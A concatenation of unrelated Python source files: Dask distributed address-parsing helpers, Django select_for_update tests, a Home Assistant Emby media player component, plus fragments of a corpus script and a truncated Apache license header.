print >> sys.stderr, "Psyco not installed"
from optparse import OptionParser
optparser = OptionParser(usage="%prog [options]\nCreate an html visualization for a corpus.")
optparser.add_option("-i", "--input", default=None, dest="input", help="Corpus in analysis format", metavar="FILE")
optparser.add_option("-o", "--output", default=None, dest="output", help="Corpus in analysis format", metavar="FILE")
optparser.add_option("-d", "--debug", default=False, action="store_true", dest="debug", help="")
(options, args) = optparser.parse_args()
assert(options.input != None)
#assert(options.output != None)
extend(options.input, options.output, verbose=options.debug)
|
|
import itertools
import dask
from . import registry
from ..utils import get_ip_interface
DEFAULT_SCHEME = dask.config.get("distributed.comm.default-scheme")
def parse_address(addr, strict=False):
"""
Split address into its scheme and scheme-dependent location string.
>>> parse_address('tcp://127.0.0.1')
('tcp', '127.0.0.1')
If strict is set to true the address must have a scheme.
"""
if not isinstance(addr, str):
raise TypeError("expected str, got %r" % addr.__class__.__name__)
scheme, sep, loc = addr.rpartition("://")
if strict and not sep:
msg = (
"Invalid url scheme. "
"Must include protocol like tcp://localhost:8000. "
"Got %s" % addr
)
raise ValueError(msg)
if not sep:
scheme = DEFAULT_SCHEME
return scheme, loc
def unparse_address(scheme, loc):
"""
Undo parse_address().
>>> unparse_address('tcp', '127.0.0.1')
'tcp://127.0.0.1'
"""
return "%s://%s" % (scheme, loc)
def normalize_address(addr):
"""
Canonicalize address, adding a default scheme if necessary.
>>> normalize_address('tls://[::1]')
'tls://[::1]'
>>> normalize_address('[::1]')
'tcp://[::1]'
"""
return unparse_address(*parse_address(addr))
def parse_host_port(address, default_port=None):
"""
Parse an endpoint address given in the form "host:port".
"""
if isinstance(address, tuple):
return address
def _fail():
raise ValueError("invalid address %r" % (address,))
def _default():
if default_port is None:
raise ValueError("missing port number in address %r" % (address,))
return default_port
if "://" in address:
_, address = address.split("://")
if address.startswith("["):
# IPv6 notation: '[addr]:port' or '[addr]'.
# The address may contain multiple colons.
host, sep, tail = address[1:].partition("]")
if not sep:
_fail()
if not tail:
port = _default()
else:
if not tail.startswith(":"):
_fail()
port = tail[1:]
else:
# Generic notation: 'addr:port' or 'addr'.
host, sep, port = address.partition(":")
if not sep:
port = _default()
elif ":" in host:
_fail()
return host, int(port)
def unparse_host_port(host, port=None):
"""
Undo parse_host_port().
"""
if ":" in host and not host.startswith("["):
host = "[%s]" % host
if port is not None:
return "%s:%s" % (host, port)
else:
return host
def get_address_host_port(addr, strict=False):
"""
Get a (host, port) tuple out of the given address.
For definition of strict check parse_address
ValueError is raised if the address scheme doesn't allow extracting
the requested information.
>>> get_address_host_port('tcp://1.2.3.4:80')
('1.2.3.4', 80)
"""
scheme, loc = parse_address(addr, strict=strict)
backend = registry.get_backend(scheme)
try:
return backend.get_address_host_port(loc)
except NotImplementedError:
raise ValueError(
"don't know how to extract host and port for address %r" % (addr,)
)
def get_address_host(addr):
"""
Return a hostname / IP address identifying the machine this address
is located on.
In contrast to get_address_host_port(), this function should always
succeed for well-formed addresses.
>>> get_address_host('tcp://1.2.3.4:80')
'1.2.3.4'
"""
scheme, loc = parse_address(addr)
backend = registry.get_backend(scheme)
return backend.get_address_host(loc)
def get_local_address_for(addr):
"""
Get a local listening address suitable for reaching *addr*.
For instance, trying to reach an external TCP address will return
a local TCP address that's routable to that external address.
>>> get_local_address_for('tcp://8.8.8.8:1234')
'tcp://192.168.1.68'
>>> get_local_address_for('tcp://127.0.0.1:1234')
'tcp://127.0.0.1'
"""
scheme, loc = parse_address(addr)
backend = registry.get_backend(scheme)
return unparse_address(scheme, backend.get_local_address_for(loc))
def resolve_address(addr):
"""
Apply scheme-specific address resolution to *addr*, replacing
all symbolic references with concrete location specifiers.
In practice, this can mean hostnames are resolved to IP addresses.
>>> resolve_address('tcp://localhost:8786')
'tcp://127.0.0.1:8786'
"""
scheme, loc = parse_address(addr)
backend = registry.get_backend(scheme)
return unparse_address(scheme, backend.resolve_address(loc))
def uri_from_host_port(host_arg, port_arg, default_port):
"""
Process the *host* and *port* CLI options.
Return a URI.
"""
# Much of distributed depends on a well-known IP being assigned to
# each entity (Worker, Scheduler, etc.), so avoid "universal" addresses
# like '' which would listen on all registered IPs and interfaces.
scheme, loc = parse_address(host_arg or "")
host, port = parse_host_port(
loc, port_arg if port_arg is not None else default_port
)
if port is None and port_arg is None:
port_arg = default_port
if port and port_arg and port != port_arg:
raise ValueError(
"port number given twice in options: "
"host %r and port %r" % (host_arg, port_arg)
)
if port is None and port_arg is not None:
port = port_arg
# Note `port = 0` means "choose a random port"
if port is None:
port = default_port
loc = unparse_host_port(host, port)
addr = unparse_address(scheme, loc)
return addr
def addresses_from_user_args(
host=None,
port=None,
interface=None,
protocol=None,
peer=None,
security=None,
default_port=0,
) -> list:
""" Get a list of addresses if the inputs are lists
This is like ``address_from_user_args`` except that it also accepts lists
for some of the arguments. If these arguments are lists then it will map
over them accordingly.
Examples
--------
>>> addresses_from_user_args(host="127.0.0.1", protocol=["inproc", "tcp"])
["inproc://127.0.0.1:", "tcp://127.0.0.1:"]
"""
def listify(obj):
if isinstance(obj, (tuple, list)):
return obj
else:
return itertools.repeat(obj)
if any(isinstance(x, (tuple, list)) for x in (host, port, interface, protocol)):
return [
address_from_user_args(
host=h,
port=p,
interface=i,
protocol=pr,
peer=peer,
security=security,
default_port=default_port,
)
for h, p, i, pr in zip(*map(listify, (host, port, interface, protocol)))
]
else:
return [
address_from_user_args(
host, port, interface, protocol, peer, security, default_port
)
]
def address_from_user_args(
host=None,
port=None,
interface=None,
protocol=None,
peer=None,
security=None,
default_port=0,
) -> str:
""" Get an address to listen on from common user provided arguments """
if security and security.require_encryption and not protocol:
protocol = "tls"
if protocol and protocol.rstrip("://") == "inplace":
if host or port or interface:
raise ValueError(
"Can not specify inproc protocol and host or port or interface"
)
else:
return "inproc://"
if interface:
if host:
raise ValueError("Can not specify both interface and host", interface, host)
else:
host = get_ip_interface(interface)
if protocol and host and "://" not in host:
host = protocol.rstrip("://") + "://" + host
if host or port:
addr = uri_from_host_port(host, port, default_port)
else:
addr = ""
if protocol:
addr = protocol.rstrip("://") + "://" + addr.split("://")[-1]
return addr
|
|
import threading
import time
from unittest import mock
from multiple_database.routers import TestRouter
from django.core.exceptions import FieldError
from django.db import (
DatabaseError, NotSupportedError, connection, connections, router,
transaction,
)
from django.test import (
TransactionTestCase, override_settings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.utils import CaptureQueriesContext
from .models import City, Country, EUCity, EUCountry, Person, PersonProfile
class SelectForUpdateTests(TransactionTestCase):
available_apps = ['select_for_update']
def setUp(self):
# This is executed in autocommit mode so that code in
# run_select_for_update can see this data.
self.country1 = Country.objects.create(name='Belgium')
self.country2 = Country.objects.create(name='France')
self.city1 = City.objects.create(name='Liberchies', country=self.country1)
self.city2 = City.objects.create(name='Samois-sur-Seine', country=self.country2)
self.person = Person.objects.create(name='Reinhardt', born=self.city1, died=self.city2)
self.person_profile = PersonProfile.objects.create(person=self.person)
# We need another database connection in transaction to test that one
# connection issuing a SELECT ... FOR UPDATE will block.
self.new_connection = connection.copy()
def tearDown(self):
try:
self.end_blocking_transaction()
except (DatabaseError, AttributeError):
pass
self.new_connection.close()
def start_blocking_transaction(self):
self.new_connection.set_autocommit(False)
# Start a blocking transaction. At some point,
# end_blocking_transaction() should be called.
self.cursor = self.new_connection.cursor()
sql = 'SELECT * FROM %(db_table)s %(for_update)s;' % {
'db_table': Person._meta.db_table,
'for_update': self.new_connection.ops.for_update_sql(),
}
self.cursor.execute(sql, ())
self.cursor.fetchone()
def end_blocking_transaction(self):
# Roll back the blocking transaction.
self.cursor.close()
self.new_connection.rollback()
self.new_connection.set_autocommit(True)
def has_for_update_sql(self, queries, **kwargs):
# Examine the SQL that was executed to determine whether it
# contains the 'SELECT..FOR UPDATE' stanza.
for_update_sql = connection.ops.for_update_sql(**kwargs)
return any(for_update_sql in query['sql'] for query in queries)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_sql_generated(self):
"""
The backend's FOR UPDATE variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update())
self.assertTrue(self.has_for_update_sql(ctx.captured_queries))
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_for_update_sql_generated_nowait(self):
"""
The backend's FOR UPDATE NOWAIT variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(nowait=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, nowait=True))
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_for_update_sql_generated_skip_locked(self):
"""
The backend's FOR UPDATE SKIP LOCKED variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(skip_locked=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, skip_locked=True))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_generated_of(self):
"""
The backend's FOR UPDATE OF variant appears in the generated SQL when
select_for_update() is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.select_related(
'born__country',
).select_for_update(
of=('born__country',),
).select_for_update(
of=('self', 'born__country')
))
features = connections['default'].features
if features.select_for_update_of_column:
expected = [
'select_for_update_person"."id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_person', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(of=('self',)))
if connection.features.select_for_update_of_column:
expected = ['select_for_update_eucountry"."country_ptr_id']
else:
expected = ['select_for_update_eucountry']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(of=('self', 'country_ptr',)))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucountry"."country_ptr_id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_eucountry', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_related_model_inheritance_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCity.objects.select_related('country').select_for_update(
of=('self', 'country'),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucity"."id',
'select_for_update_eucountry"."country_ptr_id',
]
else:
expected = ['select_for_update_eucity', 'select_for_update_eucountry']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_nested_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCity.objects.select_related('country').select_for_update(
of=('self', 'country__country_ptr',),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucity"."id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_eucity', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_multilevel_model_inheritance_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(
of=('country_ptr', 'country_ptr__entity_ptr'),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_country"."entity_ptr_id',
'select_for_update_entity"."id',
]
else:
expected = ['select_for_update_country', 'select_for_update_entity']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values('pk'))
self.assertEqual(values, [{'pk': self.person.pk}])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values_list(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values_list('pk'))
self.assertEqual(values, [(self.person.pk,)])
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_self_when_self_is_not_selected(self):
"""
select_for_update(of=['self']) when the only columns selected are from
related tables.
"""
with transaction.atomic():
values = list(Person.objects.select_related('born').select_for_update(of=('self',)).values('born__name'))
self.assertEqual(values, [{'born__name': self.city1.name}])
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_nowait_raises_error_on_block(self):
"""
If nowait is specified, we expect an error to be raised rather
than blocking.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'nowait': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_skip_locked_skips_locked_rows(self):
"""
If skip_locked is specified, the locked row is skipped resulting in
Person.DoesNotExist.
"""
self.start_blocking_transaction()
status = []
thread = threading.Thread(
target=self.run_select_for_update,
args=(status,),
kwargs={'skip_locked': True},
)
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], Person.DoesNotExist)
@skipIfDBFeature('has_select_for_update_nowait')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_nowait_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE NOWAIT is run on
a database backend that supports FOR UPDATE but not NOWAIT.
"""
with self.assertRaisesMessage(NotSupportedError, 'NOWAIT is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(nowait=True).get()
@skipIfDBFeature('has_select_for_update_skip_locked')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_skip_locked_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE SKIP LOCKED is run
on a database backend that supports FOR UPDATE but not SKIP LOCKED.
"""
with self.assertRaisesMessage(NotSupportedError, 'SKIP LOCKED is not supported on this database backend.'):
with transaction.atomic():
Person.objects.select_for_update(skip_locked=True).get()
@skipIfDBFeature('has_select_for_update_of')
@skipUnlessDBFeature('has_select_for_update')
def test_unsupported_of_raises_error(self):
"""
NotSupportedError is raised if a SELECT...FOR UPDATE OF... is run on
a database backend that supports FOR UPDATE but not OF.
"""
msg = 'FOR UPDATE OF is not supported on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
Person.objects.select_for_update(of=('self',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_unrelated_of_argument_raises_error(self):
"""
FieldError is raised if a non-relation field is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, born__country, '
'born__country__entity_ptr.'
)
invalid_of = [
('nonexistent',),
('name',),
('born__nonexistent',),
('born__name',),
('born__nonexistent', 'born__name'),
]
for of in invalid_of:
with self.subTest(of=of):
with self.assertRaisesMessage(FieldError, msg % ', '.join(of)):
with transaction.atomic():
Person.objects.select_related('born__country').select_for_update(of=of).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_related_but_unselected_of_argument_raises_error(self):
"""
FieldError is raised if a relation field that is not followed in the
query is specified in of=(...).
"""
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): %s. '
'Only relational fields followed in the query are allowed. '
'Choices are: self, born, profile.'
)
for name in ['born__country', 'died', 'died__country']:
with self.subTest(name=name):
with self.assertRaisesMessage(FieldError, msg % name):
with transaction.atomic():
Person.objects.select_related(
'born', 'profile',
).exclude(profile=None).select_for_update(of=(name,)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_model_inheritance_of_argument_raises_error_ptr_in_choices(self):
msg = (
'Invalid field name(s) given in select_for_update(of=(...)): '
'name. Only relational fields followed in the query are allowed. '
'Choices are: self, %s.'
)
with self.assertRaisesMessage(
FieldError,
msg % 'country, country__country_ptr, country__country_ptr__entity_ptr',
):
with transaction.atomic():
EUCity.objects.select_related(
'country',
).select_for_update(of=('name',)).get()
with self.assertRaisesMessage(FieldError, msg % 'country_ptr, country_ptr__entity_ptr'):
with transaction.atomic():
EUCountry.objects.select_for_update(of=('name',)).get()
@skipUnlessDBFeature('has_select_for_update', 'has_select_for_update_of')
def test_reverse_one_to_one_of_arguments(self):
"""
Reverse OneToOneFields may be included in of=(...) as long as NULLs
are excluded because LEFT JOIN isn't allowed in SELECT FOR UPDATE.
"""
with transaction.atomic():
person = Person.objects.select_related(
'profile',
).exclude(profile=None).select_for_update(of=('profile',)).get()
self.assertEqual(person.profile, self.person_profile)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_after_from(self):
features_class = connections['default'].features.__class__
attribute_to_patch = "%s.%s.for_update_after_from" % (features_class.__module__, features_class.__name__)
with mock.patch(attribute_to_patch, return_value=True):
with transaction.atomic():
self.assertIn('FOR UPDATE WHERE', str(Person.objects.filter(name='foo').select_for_update().query))
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction(self):
"""
A TransactionManagementError is raised
when a select_for_update query is executed outside of a transaction.
"""
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(Person.objects.all().select_for_update())
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_requires_transaction_only_in_execution(self):
"""
No TransactionManagementError is raised
when select_for_update is invoked outside of a transaction -
only when the query is executed.
"""
people = Person.objects.all().select_for_update()
msg = 'select_for_update cannot be used outside of a transaction.'
with self.assertRaisesMessage(transaction.TransactionManagementError, msg):
list(people)
@skipUnlessDBFeature('supports_select_for_update_with_limit')
def test_select_for_update_with_limit(self):
other = Person.objects.create(name='Grappeli', born=self.city1, died=self.city2)
with transaction.atomic():
qs = list(Person.objects.all().order_by('pk').select_for_update()[1:2])
self.assertEqual(qs[0], other)
@skipIfDBFeature('supports_select_for_update_with_limit')
def test_unsupported_select_for_update_with_limit(self):
msg = 'LIMIT/OFFSET is not supported with select_for_update on this database backend.'
with self.assertRaisesMessage(NotSupportedError, msg):
with transaction.atomic():
list(Person.objects.all().order_by('pk').select_for_update()[1:2])
def run_select_for_update(self, status, **kwargs):
"""
Utility method that runs a SELECT FOR UPDATE against all
Person instances. After the select_for_update, it attempts
to update the name of the only record, save, and commit.
This function expects to run in a separate thread.
"""
status.append('started')
try:
# We need to enter transaction management again, as this is done on
# per-thread basis
with transaction.atomic():
person = Person.objects.select_for_update(**kwargs).get()
person.name = 'Fred'
person.save()
except (DatabaseError, Person.DoesNotExist) as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
connection.close()
@skipUnlessDBFeature('has_select_for_update')
@skipUnlessDBFeature('supports_transactions')
def test_block(self):
"""
A thread running a select_for_update that accesses rows being touched
by a similar operation on another connection blocks correctly.
"""
# First, let's start the transaction in our thread.
self.start_blocking_transaction()
# Now, try it again using the ORM's select_for_update
# facility. Do this in a separate thread.
status = []
thread = threading.Thread(
target=self.run_select_for_update, args=(status,)
)
# The thread should immediately block, but we'll sleep
# for a bit to make sure.
thread.start()
sanity_count = 0
while len(status) != 1 and sanity_count < 10:
sanity_count += 1
time.sleep(1)
if sanity_count >= 10:
raise ValueError('Thread did not run and block')
# Check the person hasn't been updated. Since this isn't
# using FOR UPDATE, it won't block.
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Reinhardt', p.name)
# When we end our blocking transaction, our thread should
# be able to continue.
self.end_blocking_transaction()
thread.join(5.0)
# Check the thread has finished. Assuming it has, we should
# find that it has updated the person's name.
self.assertFalse(thread.is_alive())
# We must commit the transaction to ensure that MySQL gets a fresh read,
# since by default it runs in REPEATABLE READ mode
transaction.commit()
p = Person.objects.get(pk=self.person.pk)
self.assertEqual('Fred', p.name)
@skipUnlessDBFeature('has_select_for_update')
def test_raw_lock_not_available(self):
"""
Running a raw query which can't obtain a FOR UPDATE lock raises
the correct exception
"""
self.start_blocking_transaction()
def raw(status):
try:
list(
Person.objects.raw(
'SELECT * FROM %s %s' % (
Person._meta.db_table,
connection.ops.for_update_sql(nowait=True)
)
)
)
except DatabaseError as e:
status.append(e)
finally:
# This method is run in a separate thread. It uses its own
# database connection. Close it without waiting for the GC.
# Connection cannot be closed on Oracle because cursor is still
# open.
if connection.vendor != 'oracle':
connection.close()
status = []
thread = threading.Thread(target=raw, kwargs={'status': status})
thread.start()
time.sleep(1)
thread.join()
self.end_blocking_transaction()
self.assertIsInstance(status[-1], DatabaseError)
@skipUnlessDBFeature('has_select_for_update')
@override_settings(DATABASE_ROUTERS=[TestRouter()])
def test_select_for_update_on_multidb(self):
query = Person.objects.select_for_update()
self.assertEqual(router.db_for_write(Person), query.db)
@skipUnlessDBFeature('has_select_for_update')
def test_select_for_update_with_get(self):
with transaction.atomic():
person = Person.objects.select_for_update().get(name='Reinhardt')
self.assertEqual(person.name, 'Reinhardt')
def test_nowait_and_skip_locked(self):
with self.assertRaisesMessage(ValueError, 'The nowait option cannot be used with skip_locked.'):
Person.objects.select_for_update(nowait=True, skip_locked=True)
def test_ordered_select_for_update(self):
"""
Subqueries should respect ordering as an ORDER BY clause may be useful
to specify a row locking order to prevent deadlocks (#27193).
"""
with transaction.atomic():
qs = Person.objects.filter(id__in=Person.objects.order_by('-id').select_for_update())
self.assertIn('ORDER BY', str(qs.query))
|
|
"""
Support to interface with the Emby API.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/media_player.emby/
"""
import logging
from datetime import timedelta
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.media_player import (
MEDIA_TYPE_TVSHOW, MEDIA_TYPE_VIDEO, SUPPORT_NEXT_TRACK, SUPPORT_PAUSE,
SUPPORT_SEEK, SUPPORT_STOP, SUPPORT_PREVIOUS_TRACK, MediaPlayerDevice,
SUPPORT_PLAY, PLATFORM_SCHEMA)
from homeassistant.const import (
CONF_HOST, CONF_API_KEY, CONF_PORT, CONF_SSL, DEVICE_DEFAULT_NAME,
STATE_IDLE, STATE_OFF, STATE_PAUSED, STATE_PLAYING, STATE_UNKNOWN)
from homeassistant.helpers.event import (track_utc_time_change)
from homeassistant.util import Throttle
import homeassistant.util.dt as dt_util
REQUIREMENTS = ['pyemby==0.2']
MIN_TIME_BETWEEN_SCANS = timedelta(seconds=10)
MIN_TIME_BETWEEN_FORCED_SCANS = timedelta(seconds=1)
MEDIA_TYPE_TRAILER = 'trailer'
DEFAULT_PORT = 8096
_LOGGER = logging.getLogger(__name__)
SUPPORT_EMBY = SUPPORT_PAUSE | SUPPORT_PREVIOUS_TRACK | SUPPORT_NEXT_TRACK | \
SUPPORT_STOP | SUPPORT_SEEK | SUPPORT_PLAY
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_HOST, default='localhost'): cv.string,
vol.Optional(CONF_SSL, default=False): cv.boolean,
vol.Required(CONF_API_KEY): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.port,
})
def setup_platform(hass, config, add_devices_callback, discovery_info=None):
"""Setup the Emby platform."""
from pyemby.emby import EmbyRemote
_host = config.get(CONF_HOST)
_key = config.get(CONF_API_KEY)
_port = config.get(CONF_PORT)
if config.get(CONF_SSL):
_protocol = "https"
else:
_protocol = "http"
_url = '{}://{}:{}'.format(_protocol, _host, _port)
_LOGGER.debug('Setting up Emby server at: %s', _url)
embyserver = EmbyRemote(_key, _url)
emby_clients = {}
emby_sessions = {}
track_utc_time_change(hass, lambda now: update_devices(), second=30)
@Throttle(MIN_TIME_BETWEEN_SCANS, MIN_TIME_BETWEEN_FORCED_SCANS)
def update_devices():
"""Update the devices objects."""
devices = embyserver.get_sessions()
if devices is None:
_LOGGER.error('Error listing Emby devices.')
return
new_emby_clients = []
for device in devices:
if device['DeviceId'] == embyserver.unique_id:
break
if device['DeviceId'] not in emby_clients:
_LOGGER.debug('New Emby DeviceID: %s. Adding to Clients.',
device['DeviceId'])
new_client = EmbyClient(embyserver, device, emby_sessions,
update_devices, update_sessions)
emby_clients[device['DeviceId']] = new_client
new_emby_clients.append(new_client)
else:
emby_clients[device['DeviceId']].set_device(device)
if new_emby_clients:
add_devices_callback(new_emby_clients)
@Throttle(MIN_TIME_BETWEEN_SCANS, MIN_TIME_BETWEEN_FORCED_SCANS)
def update_sessions():
"""Update the sessions objects."""
sessions = embyserver.get_sessions()
if sessions is None:
_LOGGER.error('Error listing Emby sessions')
return
emby_sessions.clear()
for session in sessions:
emby_sessions[session['DeviceId']] = session
update_devices()
update_sessions()
class EmbyClient(MediaPlayerDevice):
"""Representation of a Emby device."""
# pylint: disable=too-many-arguments, too-many-public-methods,
def __init__(self, client, device, emby_sessions, update_devices,
update_sessions):
"""Initialize the Emby device."""
self.emby_sessions = emby_sessions
self.update_devices = update_devices
self.update_sessions = update_sessions
self.client = client
self.set_device(device)
self.media_status_last_position = None
self.media_status_received = None
def set_device(self, device):
"""Set the device property."""
self.device = device
@property
def unique_id(self):
"""Return the id of this emby client."""
return '{}.{}'.format(
self.__class__, self.device['DeviceId'])
@property
def supports_remote_control(self):
"""Return control ability."""
return self.device['SupportsRemoteControl']
@property
def name(self):
"""Return the name of the device."""
return 'emby_{}'.format(self.device['DeviceName']) or \
DEVICE_DEFAULT_NAME
@property
def session(self):
"""Return the session, if any."""
if self.device['DeviceId'] not in self.emby_sessions:
return None
return self.emby_sessions[self.device['DeviceId']]
@property
def now_playing_item(self):
"""Return the currently playing item, if any."""
session = self.session
if session is not None and 'NowPlayingItem' in session:
return session['NowPlayingItem']
@property
def state(self):
"""Return the state of the device."""
session = self.session
if session:
if 'NowPlayingItem' in session:
if session['PlayState']['IsPaused']:
return STATE_PAUSED
else:
return STATE_PLAYING
else:
return STATE_IDLE
# This is nasty. Need to find a way to determine alive
else:
return STATE_OFF
return STATE_UNKNOWN
def update(self):
"""Get the latest details."""
self.update_devices(no_throttle=True)
self.update_sessions(no_throttle=True)
# Check if we should update progress
try:
position = self.session['PlayState']['PositionTicks']
except (KeyError, TypeError):
self.media_status_last_position = None
self.media_status_received = None
else:
position = int(position) / 10000000
if position != self.media_status_last_position:
self.media_status_last_position = position
self.media_status_received = dt_util.utcnow()
def play_percent(self):
"""Return current media percent complete."""
if self.now_playing_item['RunTimeTicks'] and \
self.session['PlayState']['PositionTicks']:
try:
return int(self.session['PlayState']['PositionTicks']) / \
int(self.now_playing_item['RunTimeTicks']) * 100
except KeyError:
return 0
else:
return 0
@property
def app_name(self):
"""Return current user as app_name."""
# Ideally the media_player object would have a user property.
try:
return self.device['UserName']
except KeyError:
return None
@property
def media_content_id(self):
"""Content ID of current playing media."""
if self.now_playing_item is not None:
try:
return self.now_playing_item['Id']
except KeyError:
return None
@property
def media_content_type(self):
"""Content type of current playing media."""
if self.now_playing_item is None:
return None
try:
media_type = self.now_playing_item['Type']
if media_type == 'Episode':
return MEDIA_TYPE_TVSHOW
elif media_type == 'Movie':
return MEDIA_TYPE_VIDEO
elif media_type == 'Trailer':
return MEDIA_TYPE_TRAILER
return None
except KeyError:
return None
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
if self.now_playing_item and self.media_content_type:
try:
return int(self.now_playing_item['RunTimeTicks']) / 10000000
except KeyError:
return None
@property
def media_position(self):
"""Position of current playing media in seconds."""
return self.media_status_last_position
@property
def media_position_updated_at(self):
"""
When was the position of the current playing media valid.
Returns value from homeassistant.util.dt.utcnow().
"""
return self.media_status_received
@property
def media_image_url(self):
"""Image url of current playing media."""
if self.now_playing_item is not None:
try:
return self.client.get_image(
self.now_playing_item['ThumbItemId'], 'Thumb', 0)
except KeyError:
try:
return self.client.get_image(
self.now_playing_item[
'PrimaryImageItemId'], 'Primary', 0)
except KeyError:
return None
@property
def media_title(self):
"""Title of current playing media."""
# find a string we can use as a title
if self.now_playing_item is not None:
return self.now_playing_item['Name']
@property
def media_season(self):
"""Season of curent playing media (TV Show only)."""
if self.now_playing_item is not None and \
'ParentIndexNumber' in self.now_playing_item:
return self.now_playing_item['ParentIndexNumber']
@property
def media_series_title(self):
"""The title of the series of current playing media (TV Show only)."""
if self.now_playing_item is not None and \
'SeriesName' in self.now_playing_item:
return self.now_playing_item['SeriesName']
@property
def media_episode(self):
"""Episode of current playing media (TV Show only)."""
if self.now_playing_item is not None and \
'IndexNumber' in self.now_playing_item:
return self.now_playing_item['IndexNumber']
@property
def supported_features(self):
"""Flag media player features that are supported."""
if self.supports_remote_control:
return SUPPORT_EMBY
else:
return None
def media_play(self):
"""Send play command."""
if self.supports_remote_control:
self.client.play(self.session)
def media_pause(self):
"""Send pause command."""
if self.supports_remote_control:
self.client.pause(self.session)
def media_next_track(self):
"""Send next track command."""
self.client.next_track(self.session)
def media_previous_track(self):
"""Send previous track command."""
self.client.previous_track(self.session)
|
|
# -*- coding: utf-8 -*-
# Copyright 2013 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
